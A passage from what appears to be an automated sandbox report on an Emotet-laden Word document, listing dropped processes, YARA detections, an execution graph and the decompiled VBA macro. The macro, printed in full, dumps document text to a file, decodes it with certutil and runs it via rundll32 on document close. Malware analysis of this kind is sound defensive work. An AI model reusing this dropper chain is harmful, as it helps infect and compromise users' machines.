                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000003.2276010487.00000000005F8000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2280282398.00000000005F6000.00000004.00000020.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:02:10
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\advapi32\ieframe.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\advapi32\ieframe.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2285331820.00000000008E4000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000003.2280766001.0000000000928000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:02:13
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\nshipsec\cryptdll.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\nshipsec\cryptdll.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2292365132.00000000008C4000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000003.2286180989.0000000000908000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:04:02:15
                                                      Start date:14/01/2021
                                                      Path:C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe
                                                      Imagebase:0x400000
                                                      File size:344110 bytes
                                                      MD5 hash:E87553AEBAC0BF74D165A87321C629BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Visual Basic
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2335114479.00000000002B4000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000003.2292126114.00000000002F8000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      Disassembly

                                                      Code Analysis

                                                      Call Graph

                                                      Graph

                                                      • Entrypoint
                                                      • Decryption Function
                                                      • Executed
                                                      • Not Executed
                                                      • Show Help
                                                      callgraph 34 Document_Close 38 Form_Close Delete:1,Sleep:1,CreateObject:1 34->38 131 Button_Click2 Left:1 38->131 x 4 164 SaveAs3 38->164 x 2 179 SetTask create:1 38->179 x 2 151 Button_Click3 Right:1,Range:1

                                                      Module: ThisDocument

                                                      Declaration
                                                      LineContent
                                                      1

                                                      Attribute VB_Name = "ThisDocument"

                                                      2

                                                      Attribute VB_Base = "1Normal.ThisDocument"

                                                      3

                                                      Attribute VB_GlobalNameSpace = False

                                                      4

                                                      Attribute VB_Creatable = False

                                                      5

                                                      Attribute VB_PredeclaredId = True

                                                      6

                                                      Attribute VB_Exposed = True

                                                      7

                                                      Attribute VB_TemplateDerived = True

                                                      8

                                                      Attribute VB_Customizable = True

                                                      9

                                                      #if VBA7 then

                                                      10

                                                      Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One as Long) as Long

                                                      11

                                                      #else

                                                      12

                                                      Private Declare Function Sleep Lib "Kernel32" (ByVal One as Long) as Long

                                                      13

                                                      #endif

                                                      14

                                                      Private Ms13

                                                      15

                                                      Private One as String

                                                      16

                                                      Private Two as String

                                                      17

                                                      Private STP as String

                                                      Executed Functions
                                                      APIsMeta Information

                                                      Part of subcall function Button_Click2@ThisDocument: Left

                                                      Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                      CreateObject

                                                      CreateObject("winmgmts:Win32_Process")

                                                      Part of subcall function Button_Click2@ThisDocument: Left

                                                      Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                      Part of subcall function Button_Click2@ThisDocument: Left

                                                      Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                      Part of subcall function Button_Click2@ThisDocument: Left

                                                      Part of subcall function Button_Click2@ThisDocument: Paragraphs

                                                      Delete

                                                      Part of subcall function SaveAs3@ThisDocument: SaveAs2

                                                      Part of subcall function SaveAs3@ThisDocument: wdFormatText

                                                      Part of subcall function SaveAs3@ThisDocument: SaveAs2

                                                      Part of subcall function SaveAs3@ThisDocument: wdFormatText

                                                      Part of subcall function SetTask@ThisDocument: create

                                                      Part of subcall function SetTask@ThisDocument: act

                                                      Kernel32!Sleep

                                                      Kernel32!Sleep(6000)

                                                      Part of subcall function SetTask@ThisDocument: create

                                                      Part of subcall function SetTask@ThisDocument: act

                                                      StringsDecrypted Strings
                                                      "xls"
                                                      "doc"
                                                      LineInstructionMeta Information
                                                      22

                                                      Private Sub Form_Close()

                                                      23

                                                      STP = Button_Click2(2, 16) + "Ksh1"

                                                      executed
                                                      24

                                                      Set Ms13 = CreateObject(Button_Click2(4, 22))

                                                      CreateObject("winmgmts:Win32_Process")

                                                      executed
                                                      25

                                                      One = Button_Click2(8, 16)

                                                      26

                                                      Two = Button_Click2(6, 8)

                                                      27

                                                      ActiveDocument.Range(Start := 0, End := 3561).Delete

                                                      Delete

                                                      28

                                                      SaveAs3 ("xls")

                                                      28

                                                      SaveAs3 ("doc")

                                                      29

                                                      SetTask (One + " " + STP + ".xls " + STP + ".pdf")

                                                      29

                                                      Sleep 6000

                                                      Kernel32!Sleep(6000)

                                                      executed
                                                      29

                                                      SetTask (Two + " " + STP + ".pdf,In")

                                                      30

                                                      End Sub

                                                      APIsMeta Information

                                                      Part of subcall function Form_Close@ThisDocument: CreateObject

                                                      Part of subcall function Form_Close@ThisDocument: Delete

                                                      Part of subcall function Form_Close@ThisDocument: Sleep

                                                      LineInstructionMeta Information
                                                      19

                                                      Private Sub Document_Close()

                                                      20

                                                      Form_Close

                                                      executed
                                                      21

                                                      End Sub

                                                      APIsMeta Information

                                                      create

                                                      SWbemObjectEx.create("Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf",,,) -> 0 SWbemObjectEx.create("Rundll32 C:\Users\Public\Ksh1.pdf,In",,,) -> 0

                                                      act

                                                      LineInstructionMeta Information
                                                      40

                                                      Private Function SetTask(Task as String)

                                                      41

                                                      Ms13.create Task, Null, Null, act

                                                      SWbemObjectEx.create("Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf",,,) -> 0

                                                      act

                                                      executed
                                                      42

                                                      End Function

                                                      APIsMeta Information

                                                      Left

                                                      Paragraphs

                                                      LineInstructionMeta Information
                                                      31

                                                      Private Function Button_Click2(One as Long, Two as Long) as String

                                                      32

                                                      Button_Click2 = Left(ActiveDocument.Paragraphs(One).Range.Text, Two)

                                                      Left

                                                      Paragraphs

                                                      executed
                                                      33

                                                      End Function

                                                      APIsMeta Information

                                                      SaveAs2

                                                      wdFormatText

                                                      LineInstructionMeta Information
                                                      37

                                                      Private Function SaveAs3(Formt as String)

                                                      38

                                                      ActiveDocument.SaveAs2 FileName := STP + "." + Formt, FileFormat := wdFormatText

                                                      SaveAs2

                                                      wdFormatText

                                                      executed
                                                      39

                                                      End Function

                                                      Non-Executed Functions
                                                      APIsMeta Information

                                                      Right

                                                      Text

                                                      Range

                                                      LineInstructionMeta Information
                                                      34

                                                      Private Function Button_Click3(One as Long) as String

                                                      35

                                                      Button_Click3 = Right(Range.Text, One)

                                                      Right

                                                      Text

                                                      Range

                                                      36

                                                      End Function

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:9%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:9.6%
                                                        Total number of Nodes:1182
                                                        Total number of Limit Nodes:56

                                                        Graph

                                                        execution_graph 9874 402064 #100 9875 402072 9874->9875 9876 3e0170 9877 3e01fb 9876->9877 9892 3e0ad0 9877->9892 9883 3e02c4 9929 3e06f0 9883->9929 9885 3e02d0 9946 3e08f0 9885->9946 9887 3e02dc 9964 3e0580 9887->9964 9889 3e02e8 9890 3e02ef VirtualFree 9889->9890 9891 3e02fb 9889->9891 9890->9891 9893 3e0b2f 9892->9893 9894 3e0bf0 VirtualAlloc 9893->9894 9897 3e02ab 9893->9897 9895 3e0c1c 9894->9895 9896 3e0cdb VirtualAlloc 9895->9896 9895->9897 9896->9897 9898 3e0d60 9897->9898 9899 3e0d94 9898->9899 9900 3e0da3 VirtualAlloc RtlMoveMemory 9899->9900 9901 3e02b8 9900->9901 9905 3e0ddb 9900->9905 9908 3e0400 GetCurrentProcess 9901->9908 9903 3e0e0d RtlMoveMemory 9903->9905 9904 3e0e3c VirtualAlloc 9904->9905 9905->9901 9905->9904 9906 3e0e91 RtlFillMemory 9905->9906 9907 3e0e6a RtlMoveMemory 9905->9907 9972 3e1140 lstrcpynW 9905->9972 9906->9901 9906->9905 9907->9901 9907->9905 9973 3e1140 lstrcpynW 9908->9973 9910 3e0459 NtQueryInformationProcess 9911 3e046f 9910->9911 9912 3e04c5 9910->9912 9913 3e0575 9911->9913 9914 3e0484 GetProcessHeap HeapFree 9911->9914 9915 3e0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 9911->9915 9916 3e04e5 9912->9916 9979 3e1140 lstrcpynW 9912->9979 9914->9915 9915->9911 9915->9912 9974 3e1140 lstrcpynW 9916->9974 9919 3e04dc RtlMoveMemory 9919->9916 9920 3e04ef RtlMoveMemory 9975 3e1140 lstrcpynW 9920->9975 9922 3e0511 RtlMoveMemory 9976 3e1140 lstrcpynW 9922->9976 9924 3e0528 RtlMoveMemory 9977 3e1140 lstrcpynW 9924->9977 9926 3e053f RtlMoveMemory 9978 3e1140 lstrcpynW 9926->9978 9928 3e055a RtlMoveMemory 9928->9883 9930 3e0740 9929->9930 9936 3e0744 9930->9936 9980 3e0fb0 9930->9980 9933 3e07b5 RtlMoveMemory 9934 3e0770 9933->9934 9935 3e07ff LoadLibraryA 9934->9935 9934->9936 9988 3e1140 lstrcpynW 9934->9988 9937 3e08b9 9935->9937 9941 3e080f 9935->9941 9936->9885 9937->9885 9939 3e082d RtlMoveMemory 9939->9934 9939->9941 9940 3e0858 GetProcAddress 9940->9936 9940->9941 9941->9934 9941->9936 9941->9940 9945 3e0890 RtlMoveMemory 9941->9945 9989 3e1140 lstrcpynW 9941->9989 9990 3e1140 lstrcpynW 9941->9990 9943 3e0872 RtlMoveMemory 9991 3e1140 lstrcpynW 9943->9991 9945->9936 9945->9941 9947 3e0934 9946->9947 9948 3e0fb0 2 API calls 9947->9948 9949 3e0938 9947->9949 9950 3e0970 9948->9950 9949->9887 9950->9949 9994 3e1140 lstrcpynW 9950->9994 9952 3e09af RtlMoveMemory 9952->9949 9953 3e09c2 9952->9953 9953->9949 9995 3e1140 lstrcpynW 9953->9995 9996 3e1140 lstrcpynW 9953->9996 9998 3e1140 lstrcpynW 9953->9998 9956 3e09f6 RtlMoveMemory 9956->9953 9957 3e0a97 RtlMoveMemory 9957->9953 9958 3e0aac 9957->9958 9958->9887 9960 3e0a3e RtlMoveMemory 9960->9949 9961 3e0a57 9960->9961 9997 3e1140 lstrcpynW 9961->9997 9963 3e0a61 RtlMoveMemory 9963->9953 9968 3e05bc 9964->9968 9965 3e05c0 9965->9889 9967 3e0617 RtlMoveMemory 9967->9968 9968->9965 9970 3e069b VirtualProtect 9968->9970 9999 3e1140 lstrcpynW 9968->9999 10000 3e1140 lstrcpynW 9968->10000 9970->9968 9971 3e06c6 9970->9971 9971->9889 9972->9903 9973->9910 9974->9920 9975->9922 9976->9924 9977->9926 9978->9928 9979->9919 9982 3e0fda 9980->9982 9981 3e104a 9981->9934 9982->9981 9992 3e1140 lstrcpynW 9982->9992 9984 3e1001 9993 3e1140 lstrcpynW 9984->9993 9986 3e101b RtlMoveMemory 9987 3e1029 9986->9987 9987->9934 9988->9933 9989->9939 9990->9943 9991->9941 9992->9984 9993->9986 9994->9952 9995->9956 9996->9960 9997->9963 9998->9957 9999->9967 10000->9968 10896 3f4b70 10897 3f4b98 10896->10897 10898 3f4b82 10896->10898 10901 3f4bd7 CreateProcessW 10897->10901 10903 3f3f00 GetPEB 10897->10903 10899 3f3f00 GetPEB 10898->10899 10900 3f4b8c 10899->10900 10902 3f3e60 GetPEB 10900->10902 10904 3f4bf7 10901->10904 10905 3f4c73 10901->10905 10902->10897 10906 3f4bc6 10903->10906 10907 3f4bff 10904->10907 10909 3f4c33 10904->10909 10911 3f3f00 GetPEB 10904->10911 10908 3f3e60 GetPEB 10906->10908 10910 3f4bd2 10908->10910 10914 3f3f00 GetPEB 10909->10914 10916 3f4c5d 10909->10916 10910->10901 10912 3f4c27 10911->10912 10913 3f3e60 GetPEB 10912->10913 10913->10909 10915 3f4c51 10914->10915 10917 3f3e60 GetPEB 10915->10917 10917->10916 11145 418030 11146 418067 11145->11146 11147 418099 11146->11147 11148 418079 __vbaI4Var 11146->11148 11151 4180c8 __vbaHresultCheckObj 11147->11151 11152 4180da __vbaFreeVar 11147->11152 11153 40f5dc 11148->11153 11151->11152 11154 40f5e5 11153->11154 10001 3f30a0 10002 3f30ba 10001->10002 10003 3f32ab 10002->10003 10004 3f3238 10002->10004 10007 3f3291 RtlAllocateHeap 10002->10007 10008 3f3f00 GetPEB 10002->10008 10010 3f3e60 GetPEB 10002->10010 10003->10004 10011 3f3f00 GetPEB 10003->10011 10007->10002 10007->10004 10008->10002 10010->10002 10012 3f32bf 10011->10012 10013 3f3e60 10012->10013 10014 3f3ebc 10013->10014 10015 3f3e9c 10013->10015 10014->10004 10015->10014 10016 3f3f00 GetPEB 10015->10016 10019 3f40f5 10015->10019 10017 3f40e9 10016->10017 10018 3f3e60 GetPEB 10017->10018 10018->10019 10020 3f3f00 GetPEB 10019->10020 10026 3f4126 10019->10026 10021 3f411a 10020->10021 10023 3f3e60 GetPEB 10021->10023 10022 3f3e60 GetPEB 10025 3f4157 10022->10025 10023->10026 10024 3f4138 10024->10004 10025->10004 10026->10022 10026->10024 10918 3f3780 10919 3f3795 10918->10919 10920 3f37ab 10918->10920 10921 3f3f00 GetPEB 10919->10921 10923 3f37dd 10920->10923 10925 3f3f00 GetPEB 10920->10925 10922 3f379f 10921->10922 10924 3f3e60 GetPEB 10922->10924 10928 3f3812 10923->10928 10929 3f3f00 GetPEB 10923->10929 10924->10920 10926 3f37d1 10925->10926 10927 3f3e60 GetPEB 10926->10927 10927->10923 10931 3f384a 10928->10931 10933 3f3f00 GetPEB 10928->10933 10930 3f3806 10929->10930 10932 3f3e60 GetPEB 10930->10932 10936 3f3f00 GetPEB 10931->10936 10938 3f3876 10931->10938 10932->10928 10934 3f383e 10933->10934 10935 3f3e60 GetPEB 10934->10935 10935->10931 10937 3f386a 10936->10937 10940 3f3e60 GetPEB 10937->10940 10939 3f38d1 SHFileOperationW 10938->10939 10941 3f3f00 GetPEB 10938->10941 10940->10938 10942 3f38c0 10941->10942 10943 3f3e60 GetPEB 10942->10943 10944 3f38cc 10943->10944 10944->10939 10027 3f5ce0 10035 3f65e0 10027->10035 10029 3f5ce5 10030 3f5d09 ExitProcess 10029->10030 10031 3f3f00 GetPEB 10029->10031 10032 3f5cf8 10031->10032 10033 3f3e60 GetPEB 10032->10033 10034 3f5d04 10033->10034 10034->10030 10041 3f65fd 10035->10041 10038 3f68df 10038->10029 10039 3f6dcd 10350 3fb2e0 10039->10350 10041->10038 10041->10039 10042 3f6927 10041->10042 10044 3f706e 10041->10044 10051 3f7061 10041->10051 10067 3f4220 GetPEB 10041->10067 10076 3f3e60 GetPEB 10041->10076 10079 3f4160 GetPEB 10041->10079 10080 3f3f00 GetPEB 10041->10080 10081 3f8400 10041->10081 10087 3f7120 10041->10087 10108 3f8970 10041->10108 10120 3f80a0 10041->10120 10132 3f9860 10041->10132 10148 3f9620 10041->10148 10157 3f12b0 10041->10157 10178 3fafe0 10041->10178 10183 3f8700 10041->10183 10189 3f6060 10041->10189 10210 3fb430 10041->10210 10217 3f9f30 10041->10217 10226 3f61e0 10041->10226 10238 3f94d0 10041->10238 10245 3f8e80 10041->10245 10254 3f3310 10041->10254 10264 3f1840 10041->10264 10279 3f3460 10041->10279 10289 3f53d0 10041->10289 10294 3f9270 10041->10294 10304 3f8bb0 10041->10304 10314 3f72d0 10041->10314 10324 3f9050 10041->10324 10338 3f4770 10041->10338 10355 3fb1d0 10041->10355 10360 3f7410 10041->10360 10050 3f3f00 GetPEB 10042->10050 10058 3f6f27 GetTickCount 10042->10058 10072 3f6975 GetTickCount 10042->10072 10075 3f3e60 GetPEB 10042->10075 10375 3f8740 10044->10375 10050->10042 10366 3f8d40 10051->10366 10055 3f7073 10055->10029 10058->10041 10062 3f7066 10062->10029 10067->10041 10072->10041 10075->10042 10076->10041 10079->10041 10080->10041 10083 3f84e3 10081->10083 10082 3f85bd 10082->10041 10083->10082 10084 3f8600 CreateFileW 10083->10084 10085 3f3f00 GetPEB 10083->10085 10086 3f3e60 GetPEB 10083->10086 10084->10082 10084->10083 10085->10083 10086->10083 10091 3f7125 10087->10091 10088 3f7233 10393 3f34c0 10088->10393 10090 3f7232 10090->10041 10091->10088 10091->10090 10093 3f7080 GetPEB LoadLibraryW 10091->10093 10093->10091 10094 3f7265 LoadLibraryW 10095 3f727a 10094->10095 10096 3f7290 10094->10096 10098 3f3f00 GetPEB 10095->10098 10104 3f3f00 GetPEB 10096->10104 10107 3f72b8 10096->10107 10097 3f3f00 GetPEB 10099 3f7254 10097->10099 10101 3f7284 10098->10101 10100 3f3e60 GetPEB 10099->10100 10102 3f7260 10100->10102 10103 3f3e60 GetPEB 10101->10103 10102->10094 10103->10096 10105 3f72ac 10104->10105 10106 3f3e60 GetPEB 10105->10106 10106->10107 10107->10041 10116 3f8991 10108->10116 10110 3f3f00 GetPEB 10110->10116 10111 3f34c0 GetPEB 10111->10116 10112 3f8b74 10113 3f8add 10112->10113 10114 3f3f00 GetPEB 10112->10114 10113->10041 10115 3f8b87 10114->10115 10117 3f3e60 GetPEB 10115->10117 10116->10110 10116->10111 10116->10112 10116->10113 10118 3f3e60 GetPEB 10116->10118 10119 3f3460 GetPEB 10116->10119 10403 3f5040 10116->10403 10117->10113 10118->10116 10119->10116 10127 3f8163 10120->10127 10121 3f34c0 GetPEB 10121->10127 10122 3f8397 CreateFileW 10122->10127 10131 3f83e6 10122->10131 10123 3f83c7 10125 3f3f00 GetPEB 10123->10125 10123->10131 10124 3f8358 10124->10041 10129 3f83da 10125->10129 10126 3f3f00 GetPEB 10126->10127 10127->10121 10127->10122 10127->10123 10127->10124 10127->10126 10128 3f3e60 GetPEB 10127->10128 10128->10127 10130 3f3e60 GetPEB 10129->10130 10130->10131 10131->10041 10145 3f9880 10132->10145 10133 3f9b02 10136 3f9b26 SHGetFolderPathW 10133->10136 10137 3f3f00 GetPEB 10133->10137 10134 3f99b2 OpenSCManagerW 10134->10145 10135 3f9af5 10135->10041 10428 3f3040 10136->10428 10142 3f9b15 10137->10142 10138 3f9a66 CloseServiceHandle 10138->10145 10141 3f9969 SHGetFolderPathW 10141->10145 10144 3f3e60 GetPEB 10142->10144 10143 3f3f00 GetPEB 10143->10145 10146 3f9b21 10144->10146 10145->10133 10145->10134 10145->10135 10145->10138 10145->10141 10145->10143 10147 3f3e60 GetPEB 10145->10147 10433 3f7c60 10145->10433 10146->10136 10147->10145 10155 3f9630 10148->10155 10149 3f981f 10149->10041 10150 3f9829 10457 3f3780 10150->10457 10151 3f34c0 GetPEB 10151->10155 10153 3f9839 10153->10041 10154 3f3f00 GetPEB 10154->10155 10155->10149 10155->10150 10155->10151 10155->10154 10156 3f3e60 GetPEB 10155->10156 10156->10155 10161 3f12e1 10157->10161 10159 3f181c 10586 3f4220 10159->10586 10161->10159 10163 3f17d1 10161->10163 10166 3f34c0 GetPEB 10161->10166 10168 3f42c0 GetPEB 10161->10168 10170 3f4220 GetPEB 10161->10170 10171 3f1641 _snwprintf 10161->10171 10174 3f3f00 GetPEB 10161->10174 10175 3f3e60 GetPEB 10161->10175 10177 3f3460 GetPEB 10161->10177 10484 3f1fc0 10161->10484 10492 3f1e70 10161->10492 10501 3f5c00 10161->10501 10520 3f1c70 10161->10520 10536 3f2230 10161->10536 10544 3f2be0 10161->10544 10559 3f4ea0 10161->10559 10564 3f1900 10161->10564 10163->10041 10166->10161 10168->10161 10170->10161 10172 3f3460 GetPEB 10171->10172 10172->10161 10174->10161 10175->10161 10177->10161 10179 3fb101 10178->10179 10182 3faff8 10178->10182 10179->10041 10180 3f3e60 GetPEB 10180->10182 10181 3f3f00 GetPEB 10181->10182 10182->10179 10182->10180 10182->10181 10184 3f8709 10183->10184 10188 3f871f 10183->10188 10185 3f3f00 GetPEB 10184->10185 10186 3f8713 10185->10186 10187 3f3e60 GetPEB 10186->10187 10187->10188 10188->10041 10628 3f5500 10189->10628 10191 3f613c 10194 3f35c0 GetPEB 10191->10194 10192 3f6134 10192->10041 10193 3f3f00 GetPEB 10195 3f6074 10193->10195 10196 3f6147 10194->10196 10195->10191 10195->10192 10195->10193 10197 3f3e60 GetPEB 10195->10197 10198 3f3f00 GetPEB 10196->10198 10200 3f6168 10196->10200 10197->10195 10199 3f615c 10198->10199 10201 3f3e60 GetPEB 10199->10201 10202 3f61a2 10200->10202 10203 3f3f00 GetPEB 10200->10203 10201->10200 10205 3f61ca 10202->10205 10207 3f3f00 GetPEB 10202->10207 10204 3f6196 10203->10204 10206 3f3e60 GetPEB 10204->10206 10205->10041 10206->10202 10208 3f61be 10207->10208 10209 3f3e60 GetPEB 10208->10209 10209->10205 10212 3fb440 10210->10212 10211 3fb4ba 10211->10041 10212->10211 10638 3fab50 10212->10638 10654 3fa170 10212->10654 10675 3fa7a0 10212->10675 10695 3fa5e0 10212->10695 10225 3f9f40 10217->10225 10218 3f3f00 GetPEB 10218->10225 10219 3fa01b 10220 3f9f64 10219->10220 10221 3f3f00 GetPEB 10219->10221 10220->10041 10223 3fa02e 10221->10223 10222 3f3e60 GetPEB 10222->10225 10224 3f3e60 GetPEB 10223->10224 10224->10220 10225->10218 10225->10219 10225->10220 10225->10222 10235 3f6202 10226->10235 10228 3f42c0 GetPEB 10228->10235 10230 3f624b 10230->10041 10231 3f3e60 GetPEB 10231->10235 10232 3f3f00 GetPEB 10232->10235 10233 3f6490 10233->10041 10234 3f3f00 GetPEB 10237 3f642d 10234->10237 10235->10228 10235->10230 10235->10231 10235->10232 10235->10237 10809 3f55b0 10235->10809 10818 3f4c80 10235->10818 10236 3f3e60 GetPEB 10236->10237 10237->10233 10237->10234 10237->10236 10241 3f94f0 10238->10241 10239 3f95c2 10239->10041 10241->10239 10242 3f4c80 GetPEB 10241->10242 10243 3f3f00 GetPEB 10241->10243 10244 3f3e60 GetPEB 10241->10244 10827 3f46c0 10241->10827 10242->10241 10243->10241 10244->10241 10250 3f8ea0 10245->10250 10246 3f901b 10248 3f3f00 GetPEB 10246->10248 10249 3f8fc6 10246->10249 10247 3f3f00 GetPEB 10247->10250 10251 3f902e 10248->10251 10249->10041 10250->10246 10250->10247 10250->10249 10253 3f3e60 GetPEB 10250->10253 10252 3f3e60 GetPEB 10251->10252 10252->10249 10253->10250 10255 3f334a 10254->10255 10256 3f336f 10255->10256 10257 3f3f00 GetPEB 10255->10257 10260 3f3f00 GetPEB 10256->10260 10263 3f3397 10256->10263 10258 3f3363 10257->10258 10259 3f3e60 GetPEB 10258->10259 10259->10256 10261 3f338b 10260->10261 10262 3f3e60 GetPEB 10261->10262 10262->10263 10263->10041 10265 3f184c 10264->10265 10266 3f1862 10264->10266 10267 3f3f00 GetPEB 10265->10267 10270 3f3f00 GetPEB 10266->10270 10272 3f188b 10266->10272 10268 3f1856 10267->10268 10269 3f3e60 GetPEB 10268->10269 10269->10266 10271 3f187f 10270->10271 10274 3f3e60 GetPEB 10271->10274 10273 3f18ee 10272->10273 10842 3f25e0 10272->10842 10273->10041 10274->10272 10276 3f18d8 10277 3f18dc 10276->10277 10278 3f4220 GetPEB 10276->10278 10277->10041 10278->10273 10280 3f346d 10279->10280 10281 3f3483 10279->10281 10282 3f3f00 GetPEB 10280->10282 10285 3f3f00 GetPEB 10281->10285 10288 3f34ab 10281->10288 10283 3f3477 10282->10283 10284 3f3e60 GetPEB 10283->10284 10284->10281 10286 3f349f 10285->10286 10287 3f3e60 GetPEB 10286->10287 10287->10288 10288->10041 10293 3f53e0 10289->10293 10290 3f54b4 10290->10041 10291 3f3f00 GetPEB 10291->10293 10292 3f3e60 GetPEB 10292->10293 10293->10290 10293->10291 10293->10292 10303 3f9290 10294->10303 10296 3f949c 10297 3f9410 10296->10297 10299 3f3f00 GetPEB 10296->10299 10297->10041 10298 3f3f00 GetPEB 10298->10303 10300 3f94af 10299->10300 10302 3f3e60 GetPEB 10300->10302 10301 3f3e60 GetPEB 10301->10303 10302->10297 10303->10296 10303->10297 10303->10298 10303->10301 10857 3f1000 10303->10857 10313 3f8bc4 10304->10313 10305 3f8d1d 10866 3f36b0 10305->10866 10306 3f3780 2 API calls 10306->10313 10308 3f8d10 10308->10041 10310 3f34c0 GetPEB 10310->10313 10311 3f3e60 GetPEB 10311->10313 10312 3f3f00 GetPEB 10312->10313 10313->10305 10313->10306 10313->10308 10313->10310 10313->10311 10313->10312 10315 3f72d9 10314->10315 10316 3f72ef 10314->10316 10317 3f3f00 GetPEB 10315->10317 10320 3f3f00 GetPEB 10316->10320 10323 3f7318 10316->10323 10318 3f72e3 10317->10318 10319 3f3e60 GetPEB 10318->10319 10319->10316 10321 3f730c 10320->10321 10322 3f3e60 GetPEB 10321->10322 10322->10323 10323->10041 10325 3f9070 10324->10325 10326 3f91de 10325->10326 10327 3f91e4 10325->10327 10330 3f3f00 GetPEB 10325->10330 10335 3f3e60 GetPEB 10325->10335 10326->10041 10328 3f3f00 GetPEB 10327->10328 10329 3f921f 10327->10329 10331 3f9213 10328->10331 10332 3f9247 10329->10332 10334 3f3f00 GetPEB 10329->10334 10330->10325 10333 3f3e60 GetPEB 10331->10333 10332->10041 10333->10329 10336 3f923b 10334->10336 10335->10325 10337 3f3e60 GetPEB 10336->10337 10337->10332 10339 3f4785 10338->10339 10347 3f479b 10338->10347 10341 3f3f00 GetPEB 10339->10341 10340 3f47cb GetCurrentProcessId 10346 3f47d5 10340->10346 10343 3f478f 10341->10343 10342 3f3f00 GetPEB 10345 3f47b7 10342->10345 10344 3f3e60 GetPEB 10343->10344 10344->10347 10348 3f3e60 GetPEB 10345->10348 10346->10041 10347->10340 10347->10342 10349 3f47c3 10348->10349 10349->10340 10354 3fb2ec 10350->10354 10351 3fb422 10351->10038 10352 3f3e60 GetPEB 10352->10354 10353 3f3f00 GetPEB 10353->10354 10354->10351 10354->10352 10354->10353 10358 3fb1e0 10355->10358 10356 3fb2b2 10356->10041 10356->10356 10357 3f3f00 GetPEB 10357->10358 10358->10356 10358->10357 10359 3f3e60 GetPEB 10358->10359 10359->10358 10365 3f7420 10360->10365 10361 3f7608 10361->10041 10362 3f3f00 GetPEB 10362->10365 10363 3f3e60 GetPEB 10363->10365 10364 3f4fd0 GetPEB 10364->10365 10365->10361 10365->10362 10365->10363 10365->10364 10372 3f8d50 10366->10372 10367 3f8e3f 10368 3f4b70 2 API calls 10367->10368 10370 3f8e4f 10368->10370 10369 3f8e29 10369->10062 10370->10062 10371 3f34c0 GetPEB 10371->10372 10372->10367 10372->10369 10372->10371 10373 3f3f00 GetPEB 10372->10373 10374 3f3e60 GetPEB 10372->10374 10373->10372 10374->10372 10377 3f8753 10375->10377 10376 3f34c0 GetPEB 10376->10377 10377->10376 10378 3f8903 10377->10378 10380 3f88df 10377->10380 10381 3f3f00 GetPEB 10377->10381 10382 3f8e80 GetPEB 10377->10382 10389 3f3e60 GetPEB 10377->10389 10391 3f3780 2 API calls 10377->10391 10885 3f7700 10377->10885 10383 3f3f00 GetPEB 10378->10383 10388 3f8922 10378->10388 10380->10055 10381->10377 10382->10377 10384 3f8916 10383->10384 10386 3f3e60 GetPEB 10384->10386 10385 3f8955 10385->10055 10386->10388 10387 3f3f00 GetPEB 10390 3f8949 10387->10390 10388->10385 10388->10387 10389->10377 10392 3f3e60 GetPEB 10390->10392 10391->10377 10392->10385 10394 3f34e3 10393->10394 10395 3f3f00 GetPEB 10394->10395 10397 3f3508 10394->10397 10396 3f34fc 10395->10396 10398 3f3e60 GetPEB 10396->10398 10399 3f3f00 GetPEB 10397->10399 10402 3f3530 10397->10402 10398->10397 10400 3f3524 10399->10400 10401 3f3e60 GetPEB 10400->10401 10401->10402 10402->10094 10402->10097 10417 3f505c 